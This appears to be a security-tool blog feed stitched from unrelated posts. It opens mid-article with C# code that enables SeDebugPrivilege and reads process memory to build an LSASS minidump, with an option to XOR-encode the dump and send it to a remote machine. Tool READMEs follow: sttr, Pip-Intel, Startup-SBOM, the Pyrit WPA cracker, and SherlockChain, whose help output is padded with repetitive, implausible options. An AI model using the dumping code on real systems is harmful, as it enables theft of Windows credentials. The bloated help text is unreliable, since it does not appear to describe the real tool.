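        struct TOKEN_PRIVILEGES
        {
            public uint PrivilegeCount;
            public uint LuidLowPart;     // SeDebugPrivilege = 20
            public int LuidHighPart;
            public uint Attributes;
        }

        [DllImport("ntdll.dll")]
        static extern int NtOpenProcessToken(IntPtr ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);

        [DllImport("ntdll.dll")]
        static extern int NtAdjustPrivilegesToken(IntPtr TokenHandle,
            [MarshalAs(UnmanagedType.U1)] bool DisableAllPrivileges,
            ref TOKEN_PRIVILEGES NewState, uint BufferLength, IntPtr PreviousState, IntPtr ReturnLength);

        const uint TOKEN_ADJUST_PRIVILEGES = 0x0020;
        const uint TOKEN_QUERY = 0x0008;
        const uint SE_PRIVILEGE_ENABLED = 0x0002;

        public static void Enable()
        {
            IntPtr currentProcess = (IntPtr)(-1);   // pseudo-handle for the current process
            NtOpenProcessToken(currentProcess, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, out IntPtr token);

            var state = new TOKEN_PRIVILEGES { PrivilegeCount = 1, LuidLowPart = 20, Attributes = SE_PRIVILEGE_ENABLED };
            NtAdjustPrivilegesToken(token, false, ref state, 0, IntPtr.Zero, IntPtr.Zero);
        }
    }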

    With this it is possible to traverse process memory by calling:
    • ntdll!NtQueryVirtualMemory: Returns a MEMORY_BASIC_INFORMATION structure with the protection type, state, base address and size of each memory region
      • If the memory protection is not PAGE_NOACCESS (0x01) and the memory state is MEM_COMMIT (0x1000), meaning it is accessible and committed, the base address and size populate one entry of the Memory64List stream and the bytes can be added to the file
      • If the base address equals the lsasrv.dll base address, it is used to calculate the size of lsasrv.dll in memory
    • ntdll!NtReadVirtualMemory: Adds the bytes of that region to the Minidump file after the Memory64List stream
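
    A hedged, self-contained sketch of that loop (hProcess is assumed to come from NtOpenProcess in step 3; the struct layout and constants follow the Windows SDK, and the error handling and lsasrv.dll size calculation a real implementation needs are omitted):

    using System;
    using System.Collections.Generic;
    using System.Runtime.InteropServices;

    class RegionWalker
    {
        [StructLayout(LayoutKind.Sequential)]
        struct MEMORY_BASIC_INFORMATION
        {
            public IntPtr BaseAddress;
            public IntPtr AllocationBase;
            public uint AllocationProtect;
            public IntPtr RegionSize;
            public uint State;
            public uint Protect;
            public uint Type;
        }

        [DllImport("ntdll.dll")]
        static extern int NtQueryVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, int MemoryInformationClass,
            out MEMORY_BASIC_INFORMATION MemoryInformation, ulong MemoryInformationLength, out ulong ReturnLength);

        [DllImport("ntdll.dll")]
        static extern int NtReadVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, byte[] Buffer,
            ulong NumberOfBytesToRead, out ulong NumberOfBytesRead);

        const uint MEM_COMMIT = 0x1000;
        const uint PAGE_NOACCESS = 0x01;

        // Walks every region of the target process and returns the readable ones:
        // each address/size pair feeds one Memory64List entry, and the bytes are
        // appended to the file after the Memory64List stream.
        public static List<(IntPtr Address, long Size, byte[] Bytes)> Walk(IntPtr hProcess)
        {
            var regions = new List<(IntPtr, long, byte[])>();
            IntPtr address = IntPtr.Zero;
            MEMORY_BASIC_INFORMATION mbi;

            while (NtQueryVirtualMemory(hProcess, address, 0 /* MemoryBasicInformation */, out mbi,
                       (ulong)Marshal.SizeOf<MEMORY_BASIC_INFORMATION>(), out _) == 0)
            {
                long size = mbi.RegionSize.ToInt64();
                if (mbi.State == MEM_COMMIT && mbi.Protect != PAGE_NOACCESS)
                {
                    var buffer = new byte[size];
                    NtReadVirtualMemory(hProcess, mbi.BaseAddress, buffer, (ulong)size, out _);
                    regions.Add((mbi.BaseAddress, size, buffer));
                }
                address = (IntPtr)(mbi.BaseAddress.ToInt64() + size);   // jump to the next region
            }
            return regions;
        }
    }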


    G. Creating Minidump file

    After the previous steps we have everything necessary to create the Minidump file. We can create the file locally or send the bytes to a remote machine, with the possibility of encoding or encrypting the bytes beforehand. Some of these possibilities are coded in the delegates branch, where the file created locally can be encoded with XOR, and in the remote branch, where the file can be encoded with XOR before being sent to a remote machine.




    Sttr - Cross-Platform, Cli App To Perform Various Operations On String

    By: Zion3R


    sttr is a command-line tool that allows you to quickly run various transformation operations on strings.


    // With input prompt
    sttr

    // Direct input
    sttr md5 "Hello World"

    // File input
    sttr md5 file.text
    sttr base64-encode image.jpg

    // Reading from different processor like cat, curl, printf etc..
    echo "Hello World" | sttr md5
    cat file.txt | sttr md5

    // Writing output to a file
    sttr yaml-json file.yaml > file-output.json

    :movie_camera: Demo

    :battery: Installation

    Quick install

    You can run the curl command below to install it somewhere in your PATH for easy use. Ideally it will be installed in the ./bin folder.

    curl -sfL https://raw.githubusercontent.com/abhimanyu003/sttr/main/install.sh | sh

    Webi

    MacOS / Linux

    curl -sS https://webi.sh/sttr | sh

    Windows

    curl.exe https://webi.ms/sttr | powershell

    See here

    Homebrew

    If you are on macOS and using Homebrew, you can install sttr with the following:

    brew tap abhimanyu003/sttr
    brew install sttr

    Snap

    sudo snap install sttr

    Arch Linux

    yay -S sttr-bin

    Scoop

    scoop bucket add sttr https://github.com/abhimanyu003/scoop-bucket.git
    scoop install sttr

    Go

    go install github.com/abhimanyu003/sttr@latest

    Manually

    Download the pre-compiled binaries from the Release! page and copy them to the desired location.

    :books: Guide

    • After installation simply run the sttr command.
    // For interactive menu
    sttr
    // Provide your input
    // Press enter twice to open the operation menu
    // Press `/` to filter various operations.
    // You can also use the Up/Down arrows to select various operations.
    • Working with help.
    sttr -h

    // Example
    sttr zeropad -h
    sttr md5 -h
    • Working with file input.
    sttr {command-name} {filename}

    sttr base64-encode image.jpg
    sttr md5 file.txt
    sttr md-html Readme.md
    • Writing output to file.
    sttr yaml-json file.yaml > file-output.json
    • Taking input from another command.
    curl https://jsonplaceholder.typicode.com/users | sttr json-yaml
    • Chaining different processors.
    sttr md5 hello | sttr base64-encode

    echo "Hello World" | sttr base64-encode | sttr md5

    :boom: Supported Operations

    Encode/Decode

    • [x] ascii85-encode - Encode your text to ascii85
    • [x] ascii85-decode - Decode your ascii85 text
    • [x] base32-decode - Decode your base32 text
    • [x] base32-encode - Encode your text to base32
    • [x] base64-decode - Decode your base64 text
    • [x] base64-encode - Encode your text to base64
    • [x] base85-encode - Encode your text to base85
    • [x] base85-decode - Decode your base85 text
    • [x] base64url-decode - Decode your base64 url
    • [x] base64url-encode - Encode your text to url
    • [x] html-decode - Unescape your HTML
    • [x] html-encode - Escape your HTML
    • [x] rot13-encode - Encode your text to ROT13
    • [x] url-decode - Decode URL entities
    • [x] url-encode - Encode URL entities

    Hash

    • [x] bcrypt - Get the Bcrypt hash of your text
    • [x] md5 - Get the MD5 checksum of your text
    • [x] sha1 - Get the SHA1 checksum of your text
    • [x] sha256 - Get the SHA256 checksum of your text
    • [x] sha512 - Get the SHA512 checksum of your text

    String

    • [x] camel - Transform your text to CamelCase
    • [x] kebab - Transform your text to kebab-case
    • [x] lower - Transform your text to lower case
    • [x] reverse - Reverse Text ( txeT esreveR )
    • [x] slug - Transform your text to slug-case
    • [x] snake - Transform your text to snake_case
    • [x] title - Transform your text to Title Case
    • [x] upper - Transform your text to UPPER CASE

    Lines

    • [x] count-lines - Count the number of lines in your text
    • [x] reverse-lines - Reverse lines
    • [x] shuffle-lines - Shuffle lines randomly
    • [x] sort-lines - Sort lines alphabetically
    • [x] unique-lines - Get unique lines from list

    Spaces

    • [x] remove-spaces - Remove all spaces + new lines
    • [x] remove-newlines - Remove all new lines

    Count

    • [x] count-chars - Find the length of your text (including spaces)
    • [x] count-lines - Count the number of lines in your text
    • [x] count-words - Count the number of words in your text

    RGB/Hex

    • [x] hex-rgb - Convert a #hex-color code to RGB
    • [x] hex-encode - Encode your text Hex
    • [x] hex-decode - Convert Hexadecimal to String

    JSON

    • [x] json - Format your text as JSON
    • [x] json-escape - JSON Escape
    • [x] json-unescape - JSON Unescape
    • [x] json-yaml - Convert JSON to YAML text
    • [x] json-msgpack - Convert JSON to MSGPACK
    • [x] msgpack-json - Convert MSGPACK to JSON

    YAML

    • [x] yaml-json - Convert YAML to JSON text

    Markdown

    • [x] markdown-html - Convert Markdown to HTML

    Extract

    • [x] extract-emails - Extract emails from given text
    • [x] extract-ip - Extract IPv4 and IPv6 from your text
    • [x] extract-urls - Extract URLs from your text (we don't do a ping check)

    Other

    • [x] escape-quotes - escape single and double quotes from your text
    • [x] completion - generate the autocompletion script for the specified shell
    • [x] interactive - Use sttr in interactive mode
    • [x] version - Print the version of sttr
    • [x] zeropad - Pad a number with zeros
    • [x] and adding more....

    Featured On

    These are a few of the places where sttr has been highlighted; many thanks to all of you. Please feel free to add to the list any blogs/videos you may have made that discuss sttr.



    PIP-INTEL - OSINT and Cyber Intelligence Tool

    By: Zion3R

     


    Pip-Intel is a powerful tool designed for OSINT (Open Source Intelligence) and cyber intelligence gathering activities. It consolidates various open-source tools into a single user-friendly interface, simplifying the data collection and analysis processes for researchers and cybersecurity professionals.

    Pip-Intel utilizes Python-written pip packages to gather information from various data points. This tool is equipped with the capability to collect detailed information through email addresses, phone numbers, IP addresses, and social media accounts. It offers a wide range of functionalities including email-based OSINT operations, phone number-based inquiries, geolocating IP addresses, social media and user analyses, and even dark web searches.




    Startup-SBOM - A Tool To Reverse Engineer And Inspect The RPM And APT Databases To List All The Packages Along With Executables, Services And Versions

    By: Zion3R


    This is a simple SBOM utility which aims to provide an insider view of which packages are actually getting executed.

    The process and objective are simple: we get a clear perspective on the packages installed by APT (support for RPM and other package managers is currently being implemented). This is mainly needed to check which of the installed packages are actually being executed.


    Installation

    The packages needed are mentioned in the requirements.txt file and can be installed using pip:

    pip3 install -r requirements.txt

    Usage

    • First of all, install the packages.
    • Secondly, you need to set up the environment, such as:
      • Mounting the image: Currently I am still working on a mechanism to automatically define a mount point and mount different types of images and volumes, but it's still quite a task for me.
    • Finally, run the tool to list all the packages.
    Argument Description
    --analysis-mode Specifies the mode of operation. Default is static. Choices are static and chroot.
    --static-type Specifies the type of analysis for static mode. Required for static mode only. Choices are info and service.
    --volume-path Specifies the path to the mounted volume. Default is /mnt.
    --save-file Specifies the output file for JSON output.
    --info-graphic Specifies whether to generate visual plots for CHROOT analysis. Default is True.
    --pkg-mgr Manually specify the package manager, or omit this option for automatic detection.
    APT:
    • Static Info Analysis:
      • This command runs the program in static analysis mode, specifically using the Info Directory analysis method.
      • It analyzes the packages installed on the mounted volume located at /mnt.
      • It saves the output in a JSON file named output.json.
      • It generates visual plots for CHROOT analysis.
    ```bash
    python3 main.py --pkg-mgr apt --analysis-mode static --static-type info --volume-path /mnt --save-file output.json
    ```
    • Static Service Analysis:
      • This command runs the program in static analysis mode, specifically using the Service file analysis method.
      • It analyzes the packages installed on the mounted volume located at /custom_mount.
      • It saves the output in a JSON file named output.json.
      • It does not generate visual plots for CHROOT analysis.
    ```bash
    python3 main.py --pkg-mgr apt --analysis-mode static --static-type service --volume-path /custom_mount --save-file output.json --info-graphic False
    ```
    • Chroot analysis with or without graphic output:
      • This command runs the program in chroot analysis mode.
      • It analyzes the packages installed on the mounted volume located at /mnt.
      • It saves the output in a JSON file named output.json.
      • It generates visual plots for CHROOT analysis.
      • For graphical output keep --info-graphic as True, else False.
    ```bash
    python3 main.py --pkg-mgr apt --analysis-mode chroot --volume-path /mnt --save-file output.json --info-graphic True/False
    ```

    RPM:
    • Static Analysis:
      • Similar to how it's done for APT, but there is only one type of static scan available for now.
    ```bash
    python3 main.py --pkg-mgr rpm --analysis-mode static --volume-path /mnt --save-file output.json
    ```
    • Chroot analysis with or without graphic output:
      • Exactly as it's done for APT.
    ```bash
    python3 main.py --pkg-mgr rpm --analysis-mode chroot --volume-path /mnt --save-file output.json --info-graphic True/False
    ```

    Supporting Images

    Currently the tool works on Debian- and Red Hat-based images. I can guarantee the Debian outputs, but the Red Hat ones still need work; they are not perfect.

    I am working on the pacman side of things; I am trying to find a reliable way of accessing the pacman db for static analysis.

    Graphical Output Images (Chroot)

    APT Chroot

    RPM Chroot

    Inner Workings

    For the workings and process related documentation please read the wiki page: Link

    TODO

    • [x] Support for RPM
    • [x] Support for APT
    • [x] Support for Chroot Analysis
    • [x] Support for Versions
    • [x] Support for Chroot Graphical output
    • [x] Support for organized graphical output
    • [ ] Support for Pacman

    Ideas and Discussions

    Ideas regarding this topic are welcome in the discussions page.



    Pyrit - The Famous WPA Precomputed Cracker

    By: Zion3R


    Pyrit allows you to create massive databases that pre-compute the WPA/WPA2-PSK authentication phase in a space-time trade-off. By using the computational power of multi-core CPUs and other platforms through ATI-Stream, Nvidia CUDA and OpenCL, it is currently by far the most powerful attack against one of the world's most used security protocols.

    WPA/WPA2-PSK is a subset of IEEE 802.11 WPA/WPA2 that skips the complex task of key distribution and client authentication by assigning every participating party the same pre-shared key. This master key is derived from a password which the administrating user has to pre-configure, e.g. on his laptop and the Access Point. When the laptop creates a connection to the Access Point, a new session key is derived from the master key to encrypt and authenticate following traffic. The "shortcut" of using a single master key instead of per-user keys eases deployment of WPA/WPA2-protected networks for home and small-office use at the cost of making the protocol vulnerable to brute-force attacks against its key negotiation phase; this ultimately allows the password that protects the network to be revealed. This vulnerability has to be considered exceptionally disastrous as the protocol allows much of the key derivation to be pre-computed, making simple brute-force attacks even more alluring to the attacker. For more background see this article on the project's blog (outdated).


    The author does not encourage or support using Pyrit for the infringement of peoples' communication-privacy. The exploration and realization of the technology discussed here motivate as a purpose of their own; this is documented by the open development, strictly sourcecode-based distribution and 'copyleft'-licensing.

    Pyrit is free software - free as in freedom. Everyone can inspect, copy or modify it and share derived work under the GNU General Public License v3+. It compiles and executes on a wide variety of platforms including FreeBSD, MacOS X and Linux as operating systems and x86-, alpha-, arm-, hppa-, mips-, powerpc-, s390 and sparc-processors.

    Attacking WPA/WPA2 by brute force boils down to computing Pairwise Master Keys as fast as possible. Every Pairwise Master Key is 'worth' exactly one megabyte of data getting pushed through PBKDF2-HMAC-SHA1. In turn, computing 10,000 PMKs per second is equivalent to hashing 9.8 gigabytes of data with SHA-1 every second.

    These are examples of how multiple computational nodes can access a single storage server over various ways provided by Pyrit:

    • A single storage server (e.g. a MySQL server)
    • A local network that can access the storage server directly and provides four computational nodes on various levels, with only one node actually accessing the storage server itself.
    • Another, untrusted network that accesses the storage through Pyrit's RPC interface and provides three computational nodes, two of which actually access the RPC interface.

    What's new

    • Fixed #479 and #481
    • Pyrit CUDA now compiles in OSX with Toolkit 7.5
    • Added use_CUDA and use_OpenCL in config file
    • Improved cores listing and managing
    • limit_ncpus now disables all CPUs when set to value <= 0
    • Improve CCMP packet identification, thanks to yannayl

    See CHANGELOG file for a better description.

    How to use

    Pyrit compiles and runs fine on Linux, MacOS X and BSD. I don't care about Windows; drop me a line (read: patch) if you make Pyrit work without copying half of GNU ... A guide for installing Pyrit on your system can be found in the wiki. There is also a Tutorial and a reference manual for the commandline-client.

    How to participate

    You may want to read this wiki entry if you are interested in porting Pyrit to a new hardware platform. For contributions or bug reports, you should submit an issue (https://github.com/JPaulMora/Pyrit/issues).



    SherlockChain - A Streamlined AI Analysis Framework For Solidity, Vyper And Plutus Contracts

    By: Zion3R


    SherlockChain is a powerful smart contract analysis framework that combines the capabilities of the renowned Slither tool with advanced AI-powered features. Developed by a team of security experts and AI researchers, SherlockChain offers unparalleled insights and vulnerability detection for Solidity, Vyper and Plutus smart contracts.


    Key Features

    • Comprehensive Vulnerability Detection: SherlockChain's suite of detectors identifies a wide range of vulnerabilities, including high-impact issues like reentrancy, unprotected upgrades, and more.
    • AI-Powered Analysis: Integrated AI models enhance the accuracy and precision of vulnerability detection, providing developers with actionable insights and recommendations.
    • Seamless Integration: SherlockChain seamlessly integrates with popular development frameworks like Hardhat, Foundry, and Brownie, making it easy to incorporate into your existing workflow.
    • Intuitive Reporting: SherlockChain generates detailed reports with clear explanations and code snippets, helping developers quickly understand and address identified issues.
    • Customizable Analyses: The framework's flexible API allows users to write custom analyses and detectors, tailoring the tool to their specific needs.
    • Continuous Monitoring: SherlockChain can be integrated into your CI/CD pipeline, providing ongoing monitoring and alerting for your smart contract codebase.

    Installation

    To install SherlockChain, follow these steps:

    git clone https://github.com/0xQuantumCoder/SherlockChain.git
    cd SherlockChain
    pip install .

    AI-Powered Features

    SherlockChain's AI integration brings several advanced capabilities to the table:

    1. Intelligent Vulnerability Prioritization: AI models analyze the context and potential impact of detected vulnerabilities, providing developers with a prioritized list of issues to address.
    2. Automated Remediation Suggestions: The AI component suggests potential fixes and code modifications to address identified vulnerabilities, accelerating the remediation process.
    3. Proactive Security Auditing: SherlockChain's AI models continuously monitor your codebase, proactively identifying emerging threats and providing early warning signals.
    4. Natural Language Interaction: Users can interact with SherlockChain using natural language, allowing them to query the tool, request specific analyses, and receive detailed responses.

    The --help command in the SherlockChain framework provides a comprehensive overview of all the available options and features. It includes information on:

    1. Vulnerability Detection: The --detect and --exclude-detectors options allow users to specify which vulnerability detectors to run, including both built-in and AI-powered detectors.

    2. Reporting: The --report-format, --report-output, and various --report-* options control how the analysis results are reported, including the ability to generate reports in different formats (JSON, Markdown, SARIF, etc.).
    3. Filtering: The --filter-* options enable users to filter the reported issues based on severity, impact, confidence, and other criteria.
    4. AI Integration: The --ai-* options allow users to configure and control the AI-powered features of SherlockChain, such as prioritizing high-impact vulnerabilities, enabling specific AI detectors, and managing AI model configurations.
    5. Integration with Development Frameworks: Options like --truffle and --truffle-build-directory facilitate the integration of SherlockChain into popular development frameworks like Truffle.
    6. Miscellaneous Options: Additional options for compiling contracts, listing detectors, and customizing the analysis process.

    The --help command provides a detailed explanation of each option, its purpose, and how to use it, making it a valuable resource for users to quickly understand and leverage the full capabilities of the SherlockChain framework.

    Example usage:

    sherlockchain --help

    This will display the comprehensive usage guide for the SherlockChain framework, including all available options and their descriptions.

    usage: sherlockchain [-h] [--version] [--solc-remaps SOLC_REMAPS] [--solc-settings SOLC_SETTINGS]
    [--solc-version SOLC_VERSION] [--truffle] [--truffle-build-directory TRUFFLE_BUILD_DIRECTORY]
    [--truffle-config-file TRUFFLE_CONFIG_FILE] [--compile] [--list-detectors]
    [--list-detectors-info] [--detect DETECTORS] [--exclude-detectors EXCLUDE_DETECTORS]
    [--print-issues] [--json] [--markdown] [--sarif] [--text] [--zip] [--output OUTPUT]
    [--filter-paths FILTER_PATHS] [--filter-paths-exclude FILTER_PATHS_EXCLUDE]
    [--filter-contracts FILTER_CONTRACTS] [--filter-contracts-exclude FILTER_CONTRACTS_EXCLUDE]
    [--filter-severity FILTER_SEVERITY] [--filter-impact FILTER_IMPACT]
    [--filter-confidence FILTER_CONFIDENCE] [--filter-check-suicidal]
[--filter-check-upgradeable] [--filter-check-erc20] [--filter-check-erc721]
    [--filter-check-reentrancy] [--filter-check-gas-optimization] [--filter-check-code-quality]
    [--filter-check-best-practices] [--filter-check-ai-detectors] [--filter-check-all]
    [--filter-check-none] [--check-all] [--check-suicidal] [--check-upgradeable]
    [--check-erc20] [--check-erc721] [--check-reentrancy] [--check-gas-optimization]
    [--check-code-quality] [--check-best-practices] [--check-ai-detectors] [--check-none]
    [--check-all-detectors] [--check-all-severity] [--check-all-impact] [--check-all-confidence]
    [--check-all-categories] [--check-all-filters] [--check-all-options] [--check-all]
    [--check-none] [--report-format {json,markdown,sarif,text,zip}] [--report-output OUTPUT]
[--report-severity REPORT_SEVERITY] [--report-impact REPORT_IMPACT]
    [--report-confidence REPORT_CONFIDENCE] [--report-check-suicidal]
    [--report-check-upgradeable] [--report-check-erc20] [--report-check-erc721]
    [--report-check-reentrancy] [--report-check-gas-optimization] [--report-check-code-quality]
    [--report-check-best-practices] [--report-check-ai-detectors] [--report-check-all]
    [--report-check-none] [--report-all] [--report-suicidal] [--report-upgradeable]
    [--report-erc20] [--report-erc721] [--report-reentrancy] [--report-gas-optimization]
    [--report-code-quality] [--report-best-practices] [--report-ai-detectors] [--report-none]
    [--report-all-detectors] [--report-all-severity] [--report-all-impact]
    [--report-all-confidence] [--report-all-categories] [--report-all-filters]
[--report-all-options] [--report-all] [--report-none] [--ai-enabled] [--ai-disabled]
    [--ai-priority-high] [--ai-priority-medium] [--ai-priority-low] [--ai-priority-all]
    [--ai-priority-none] [--ai-confidence-high] [--ai-confidence-medium] [--ai-confidence-low]
    [--ai-confidence-all] [--ai-confidence-none] [--ai-detectors-all] [--ai-detectors-none]
    [--ai-detectors-specific AI_DETECTORS_SPECIFIC] [--ai-detectors-exclude AI_DETECTORS_EXCLUDE]
    [--ai-models-path AI_MODELS_PATH] [--ai-models-update] [--ai-models-download]
    [--ai-models-list] [--ai-models-info] [--ai-models-version] [--ai-models-check]
    [--ai-models-upgrade] [--ai-models-remove] [--ai-models-clean] [--ai-models-reset]
    [--ai-models-backup] [--ai-models-restore] [--ai-models-export] [--ai-models-import]
    [--ai-models-config AI_MODELS_CONFIG] [--ai-models-config-update] [--ai-models-config-reset]
    [--ai-models-config-export] [--ai-models-config-import] [--ai-models-config-list]
    [--ai-models-config-info] [--ai-models-config-version] [--ai-models-config-check]
    [--ai-models-config-upgrade] [--ai-models-config-remove] [--ai-models-config-clean]
    [--ai-models-config-reset] [--ai-models-config-backup] [--ai-models-config-restore]
    [--ai-models-config-export] [--ai-models-config-import] [--ai-models-config-path AI_MODELS_CONFIG_PATH]
    [--ai-models-config-file AI_MODELS_CONFIG_FILE] [--ai-models-config-url AI_MODELS_CONFIG_URL]
    [--ai-models-config-name AI_MODELS_CONFIG_NAME] [--ai-models-config-description AI_MODELS_CONFIG_DESCRIPTION]
    [--ai-models-config-version-major AI_MODELS_CONFIG_VERSION_MAJOR]
[--ai-models-config-version-minor AI_MODELS_CONFIG_VERSION_MINOR]
    [--ai-models-config-version-patch AI_MODELS_CONFIG_VERSION_PATCH]
    [--ai-models-config-author AI_MODELS_CONFIG_AUTHOR]
    [--ai-models-config-license AI_MODELS_CONFIG_LICENSE]
    [--ai-models-config-url-documentation AI_MODELS_CONFIG_URL_DOCUMENTATION]
    [--ai-models-config-url-source AI_MODELS_CONFIG_URL_SOURCE]
    [--ai-models-config-url-issues AI_MODELS_CONFIG_URL_ISSUES]
    [--ai-models-config-url-changelog AI_MODELS_CONFIG_URL_CHANGELOG]
    [--ai-models-config-url-support AI_MODELS_CONFIG_URL_SUPPORT]
    [--ai-models-config-url-website AI_MODELS_CONFIG_URL_WEBSITE]
    [--ai-models-config-url-logo AI_MODELS_CONFIG_URL_LOGO]
    [--ai-models-config-url-icon AI_MODELS_CONFIG_URL_ICON]
    [--ai-models-config-url-banner AI_MODELS_CONFIG_URL_BANNER]
    [--ai-models-config-url-screenshot AI_MODELS_CONFIG_URL_SCREENSHOT]
    [--ai-models-config-url-video AI_MODELS_CONFIG_URL_VIDEO]
    [--ai-models-config-url-demo AI_MODELS_CONFIG_URL_DEMO]
    [--ai-models-config-url-documentation-api AI_MODELS_CONFIG_URL_DOCUMENTATION_API]
    [--ai-models-config-url-documentation-user AI_MODELS_CONFIG_URL_DOCUMENTATION_USER]
    [--ai-models-config-url-documentation-developer AI_MODELS_CONFIG_URL_DOCUMENTATION_DEVELOPER]
    [--ai-models-config-url-documentation-faq AI_MODELS_CONFIG_URL_DOCUMENTATION_FAQ]
    [--ai-models-config-url-documentation-tutorial AI_MODELS_CONFIG_URL_DOCUMENTATION_TUTORIAL]
    [--ai-models-config-url-documentation-guide AI_MODELS_CONFIG_URL_DOCUMENTATION_GUIDE]
    [--ai-models-config-url-documentation-whitepaper AI_MODELS_CONFIG_URL_DOCUMENTATION_WHITEPAPER]
    [--ai-models-config-url-documentation-roadmap AI_MODELS_CONFIG_URL_DOCUMENTATION_ROADMAP]
    [--ai-models-config-url-documentation-blog AI_MODELS_CONFIG_URL_DOCUMENTATION_BLOG]
    [--ai-models-config-url-documentation-community AI_MODELS_CONFIG_URL_DOCUMENTATION_COMMUNITY]

    This comprehensive usage guide provides information on all the available options and features of the SherlockChain framework, including:

    • Vulnerability detection options: --detect, --exclude-detectors
    • Reporting options: --report-format, --report-output, --report-*
    • Filtering options: --filter-*
    • AI integration options: --ai-*
    • Integration with development frameworks: --truffle, --truffle-build-directory
    • Miscellaneous options: --compile, --list-detectors, --list-detectors-info

    By reviewing this comprehensive usage guide, you can quickly understand how to leverage the full capabilities of the SherlockChain framework to analyze your smart contracts and identify potential vulnerabilities. This will help you ensure the security and reliability of your DeFi protocol before deployment.
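To make the CI/CD integration mentioned above concrete, here is a minimal Python sketch of a pipeline gate that shells out to the CLI using flags and detector names taken from the usage text and detector tables above. The JSON report structure, the finding keys, and the exit-code handling are assumptions for illustration, not documented SherlockChain behavior.

# Minimal CI gate sketch. Assumptions: --report-format json writes a JSON list
# of findings to the --report-output path, and each finding has "impact",
# "check" and "description" keys. Adjust to the real report schema.
import json
import subprocess
import sys

def run_scan(target: str, report_path: str = "sherlockchain-report.json") -> list:
    # Flags and detector names appear in the usage text and detector tables above.
    subprocess.run(
        ["sherlockchain", target,
         "--detect", "reentrancy-eth,unprotected-upgrade,suicidal",
         "--report-format", "json",
         "--report-output", report_path],
        check=False,  # gate on findings below, not on the process exit code
    )
    with open(report_path) as fh:
        return json.load(fh)

def gate(findings: list) -> int:
    blocking = [f for f in findings if f.get("impact") in ("High", "Medium")]
    for f in blocking:
        print(f"[{f.get('impact')}] {f.get('check')}: {f.get('description')}")
    return 1 if blocking else 0

if __name__ == "__main__":
    sys.exit(gate(run_scan(sys.argv[1] if len(sys.argv) > 1 else ".")))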

    AI-Powered Detectors

    Num Detector What it Detects Impact Confidence
    1 ai-anomaly-detection Detect anomalous code patterns using advanced AI models High High
    2 ai-vulnerability-prediction Predict potential vulnerabilities using machine learning High High
    3 ai-code-optimization Suggest code optimizations based on AI-driven analysis Medium High
    4 ai-contract-complexity Assess contract complexity and maintainability using AI Medium High
    5 ai-gas-optimization Identify gas-optimizing opportunities with AI Medium Medium
Detectors
    Num Detector What it Detects Impact Confidence
    1 abiencoderv2-array Storage abiencoderv2 array High High
    2 arbitrary-send-erc20 transferFrom uses arbitrary from High High
    3 array-by-reference Modifying storage array by value High High
    4 encode-packed-collision ABI encodePacked Collision High High
    5 incorrect-shift The order of parameters in a shift instruction is incorrect. High High
    6 multiple-constructors Multiple constructor schemes High High
    7 name-reused Contract's name reused High High
    8 protected-vars Detected unprotected variables High High
    9 public-mappings-nested Public mappings with nested variables High High
    10 rtlo Right-To-Left-Override control character is used High High
    11 shadowing-state State variables shadowing High High
    12 suicidal Functions allowing anyone to destruct the contract High High
    13 uninitialized-state Uninitialized state variables High High
    14 uninitialized-storage Uninitialized storage variables High High
    15 unprotected-upgrade Unprotected upgradeable contract High High
    16 codex Use Codex to find vulnerabilities. High Low
    17 arbitrary-send-erc20-permit transferFrom uses arbitrary from with permit High Medium
    18 arbitrary-send-eth Functions that send Ether to arbitrary destinations High Medium
    19 controlled-array-length Tainted array length assignment High Medium
    20 controlled-delegatecall Controlled delegatecall destination High Medium
    21 delegatecall-loop Payable functions using delegatecall inside a loop High Medium
    22 incorrect-exp Incorrect exponentiation High Medium
    23 incorrect-return If a return is incorrectly used in assembly mode. High Medium
    24 msg-value-loop msg.value inside a loop High Medium
    25 reentrancy-eth Reentrancy vulnerabilities (theft of ethers) High Medium
    26 return-leave If a return is used instead of a leave. High Medium
    27 storage-array Signed storage integer array compiler bug High Medium
    28 unchecked-transfer Unchecked tokens transfer High Medium
    29 weak-prng Weak PRNG High Medium
    30 domain-separator-collision Detects ERC20 tokens that have a function whose signature collides with EIP-2612's DOMAIN_SEPARATOR() Medium High
    31 enum-conversion Detect dangerous enum conversion Medium High
    32 erc20-interface Incorrect ERC20 interfaces Medium High
    33 erc721-interface Incorrect ERC721 interfaces Medium High
    34 incorrect-equality Dangerous strict equalities Medium High
    35 locked-ether Contracts that lock ether Medium High
    36 mapping-deletion Deletion on mapping containing a structure Medium High
    37 shadowing-abstract State variables shadowing from abstract contracts Medium High
    38 tautological-compare Comparing a variable to itself always returns true or false, depending on comparison Medium High
    39 tautology Tautology or contradiction Medium High
    40 write-after-write Unused write Medium High
    41 boolean-cst Misuse of Boolean constant Medium Medium
    42 constant-function-asm Constant functions using assembly code Medium Medium
    43 constant-function-state Constant functions changing the state Medium Medium
    44 divide-before-multiply Imprecise arithmetic operations order Medium Medium
    45 out-of-order-retryable Out-of-order retryable transactions Medium Medium
    46 reentrancy-no-eth Reentrancy vulnerabilities (no theft of ethers) Medium Medium
    47 reused-constructor Reused base constructor Medium Medium
    48 tx-origin Dangerous usage of tx.origin Medium Medium
    49 unchecked-lowlevel Unchecked low-level calls Medium Medium
    50 unchecked-send Unchecked send Medium Medium
    51 uninitialized-local Uninitialized local variables Medium Medium
    52 unused-return Unused return values Medium Medium
    53 incorrect-modifier Modifiers that can return the default value Low High
    54 shadowing-builtin Built-in symbol shadowing Low High
    55 shadowing-local Local variables shadowing Low High
    56 uninitialized-fptr-cst Uninitialized function pointer calls in constructors Low High
    57 variable-scope Local variables used prior their declaration Low High
    58 void-cst Constructor called not implemented Low High
    59 calls-loop Multiple calls in a loop Low Medium
    60 events-access Missing Events Access Control Low Medium
    61 events-maths Missing Events Arithmetic Low Medium
    62 incorrect-unary Dangerous unary expressions Low Medium
    63 missing-zero-check Missing Zero Address Validation Low Medium
    64 reentrancy-benign Benign reentrancy vulnerabilities Low Medium
    65 reentrancy-events Reentrancy vulnerabilities leading to out-of-order Events Low Medium
    66 return-bomb A low level callee may consume all callers gas unexpectedly. Low Medium
    67 timestamp Dangerous usage of block.timestamp Low Medium
    68 assembly Assembly usage Informational High
    69 assert-state-change Assert state change Informational High
    70 boolean-equal Comparison to boolean constant Informational High
    71 cyclomatic-complexity Detects functions with high (> 11) cyclomatic complexity Informational High
    72 deprecated-standards Deprecated Solidity Standards Informational High
    73 erc20-indexed Un-indexed ERC20 event parameters Informational High
